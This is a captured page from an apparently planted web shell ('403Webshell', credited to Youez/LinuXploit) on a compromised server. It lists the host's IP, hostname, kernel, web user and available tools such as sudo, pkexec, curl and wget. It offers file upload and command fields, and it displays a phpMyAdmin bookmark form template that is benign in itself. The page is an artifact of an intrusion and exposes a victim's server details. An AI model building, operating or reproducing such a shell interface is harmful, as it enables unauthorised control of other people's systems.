403Webshell
Server IP : 202.61.199.114  /  Your IP : 216.73.217.139
Web Server : nginx/1.22.1
System : Linux de.arni-solutions.de 6.1.0-49-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
User : web20 ( 1018)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/clients/client2/web12/web/templates/sql/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/clients/client2/web12/web/templates/sql/bookmark.twig
<form action="{{ url('/sql') }}" method="post" class="bookmarkQueryForm print_ignore"
    onsubmit="return ! Functions.emptyCheckTheField(this, 'bkm_fields[bkm_label]');">
    {{ get_hidden_inputs() }}
    <input type="hidden" name="db" value="{{ db }}">
    <input type="hidden" name="goto" value="{{ goto }}">
    <input type="hidden" name="bkm_fields[bkm_database]" value="{{ db }}">
    <input type="hidden" name="bkm_fields[bkm_user]" value="{{ user }}">
    <input type="hidden" name="bkm_fields[bkm_sql_query]" value="{{ sql_query }}">
    <fieldset>
        <legend>
            {{ get_icon('b_bookmark', 'Bookmark this SQL query'|trans, true) }}
        </legend>
        <div class="formelement">
            <label>
                {% trans 'Label:' %}
                <input type="text" name="bkm_fields[bkm_label]" value="">
            </label>
        </div>
        <div class="formelement">
            <label>
                <input type="checkbox" name="bkm_all_users" value="true">
                {% trans 'Let every user access this bookmark' %}
            </label>
        </div>
        <div class="clearfloat"></div>
    </fieldset>
    <fieldset class="tblFooters">
        <input type="hidden" name="store_bkm" value="1">
        <input class="btn btn-secondary" type="submit" value="{% trans 'Bookmark this SQL query' %}">
    </fieldset>
</form>

Youez - 2016 - github.com/yon3zu
LinuXploit